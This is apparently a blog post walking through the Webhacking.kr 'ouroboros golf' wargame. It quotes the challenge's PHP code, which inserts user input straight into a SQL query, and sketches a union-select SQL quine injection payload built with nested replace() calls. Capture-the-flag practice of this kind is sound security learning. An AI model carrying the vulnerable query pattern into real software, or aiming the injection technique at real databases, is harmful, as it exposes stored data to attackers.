What is Quine? let's refer to Wiki.
A quine is a computer program which takes no input and produces a copy of its own source code as its only output. The standard terms for these programs in the computability theory and computer science literature are self-replicating programs,self-reproducing programs, and self-copying programs
There is good example wargame problem which is ouroboros golf of Webhacking.kr.
Below is the problem code:
<?php
include "../../config.php";
login_chk();
print_best_golfer(73);
$db = dbconnect("ouroboros");
if(preg_match("/\./i", $_GET['pw'])) exit("No Hack ~_~");
$query = "select pw from prob_ouroboros where pw='{$_GET['pw']}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['pw']) echo "<h2>Pw : {$result['pw']}</h2>";
if(($result['pw']) && ($result['pw'] === $_GET['pw'])){
// !!THIS IS PAYLOAD GOLF CHALLENGE!!
// My solution of ouroboros golf is 210byte.
// If your solution is shorter than mine, you will get 5 point per 1 byte.
$len = 210 - strlen($_GET['pw']);
if($len > 0){
solve(73,$len * 5);
}
else{
echo "<h2>nice try :)</h2>";
}
}
highlight_file(__FILE__);
?>I should inject a SQL query, it will be $_GET['pw']. and the SQL query will run to DB, and return the result as per the code $result['pw'].
Next, the $reuslt['pw'] should be exist and same as my input. ($result['pw'] === $_GET['pw']).
Last, the payload should be less than 210 lengths.
Now, it sounds like time to make a Quine Generator for SQL. We can use replacement mothod, indirect ($) replacement method and union select.
We can pseudocode the simple replacement as follow:
'union+select+replace(replace('"union+select+replace(replace("$",char(34),char(39)),char(36),"$")as+a%23',char(34),char(39)),char(36),'"union+select+replace(replace("$",char(34),char(39)),char(36)"$")as+a%23')as+a%23It makes same $result['pw'] and $_GET['pw']. You could reduce the length. For your Quine practice, I don't put a correct answer here.
END
No comments:
Post a Comment